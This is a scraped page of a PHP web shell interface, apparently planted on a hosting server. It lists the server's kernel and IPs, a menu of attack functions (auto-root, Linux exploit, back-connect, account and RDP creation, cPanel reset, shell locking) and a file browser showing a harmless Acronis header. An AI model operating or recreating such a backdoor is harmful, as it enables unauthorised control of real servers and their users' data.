Linux eyewebsolution.dnshostserver.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
: 185.131.55.234 | : 216.73.216.36
674 Domain
5.6.40
omxrelocation
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
snapapi26-0.8.31 /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
11.84
KB
-rw-r--r--
dkms.conf
437
B
-rw-r--r--
sn_huge_ptr.h
513
B
-rw-r--r--
snapapi.h
8.42
KB
-rw-r--r--
snapapi26.c
140.05
KB
-rw-r--r--
snapapi_genconfig.sh
3.48
KB
-rwxr-xr-x
snumbd.h
3.14
KB
-rw-r--r--
snumbd26.c
39.75
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sn_huge_ptr.h
/* Copyright (C) Acronis, 2004-2006 Written by Vladimir Simonov $Id$ */ #ifndef SN_HUGE_PTR_H_INCLUDED #define SN_HUGE_PTR_H_INCLUDED #ifdef _LP64 #define SN_HUGE_PTR(ptr) ptr #define SN_HUGE_PTR2(ptr) ptr #else #ifdef __BIG_ENDIAN__ #define SN_HUGE_PTR(ptr) unsigned pad; ptr #define SN_HUGE_PTR2(ptr) unsigned pad2; ptr #else #define SN_HUGE_PTR(ptr) ptr; unsigned pad #define SN_HUGE_PTR2(ptr) ptr; unsigned pad2 #endif /* __BIG_ENDIAN__ */ #endif /* _LP64 */ #endif /* SN_HUGE_PTR_H_INCLUDED */
Close